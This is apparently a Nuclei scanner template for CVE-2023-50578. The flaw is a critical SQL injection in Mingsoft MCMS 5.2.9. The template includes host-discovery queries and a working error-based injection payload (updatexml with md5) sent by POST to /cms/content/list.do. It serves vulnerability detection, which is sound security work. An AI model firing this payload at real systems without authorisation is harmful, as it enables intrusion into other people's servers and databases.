id: CVE-2023-50578

info:
  name: Mingsoft MCMS 5.2.9 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    Mingsoft MCMS v5.2.9 contains a SQL injection caused by unsanitized categoryType parameter at /content/list.do, letting attackers execute arbitrary SQL commands, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data leakage, modification, or deletion.
  remediation: |
    Update to the latest version of Mingsoft MCMS or apply security patches that sanitize input parameters.
  reference:
    - https://gitee.com/mingSoft/MCMS/issues/I8MAJK
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50578
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-50578
    cwe-id: CWE-89
    epss-score: 0.31687
    epss-percentile: 0.9689
    cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mingsoft
    product: mcms
    shodan-query: http.favicon.hash:1464851260
    fofa-query: icon_hash="1464851260"
  tags: cve,cve2023,mingsoft,mcms,sqli,vuln

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /cms/content/list.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        categoryType=1&sqlWhere=%5b%7b%22action%22%3a%22and%22%2c%22field%22%3a%22updatexml(1%2cconcat(0x7e%2cmd5({{num}})%2c0x7e)%2c1)%22%2c%22el%22%3a%22eq%22%2c%22model%22%3a%22contentTitle%22%2c%22name%22%3a%22%C3%A6%C2%96%C2%87%C3%A7%C2%AB%20%C3%A6%20%C2%87%C3%A9%C2%A2%C2%98%22%2c%22type%22%3a%22input%22%2c%22value%22%3a%22111%22%7d%5d&pageNo=1&pageSize=10

    matchers:
      - type: word
        part: body
        words:
          - "c8c605999f3d8352d7bb792cf3fdb25"
# digest: 490a00463044022056fb76d5e5c3ce0d175c389df3fa7ec1809815aac3f2004c48318ac38a7de17602201ba31aa9516c64e7de2d5fa40ef43664939d00f99ed0328858917601ddc28360:922c64590222798bb761d5b6d8e72950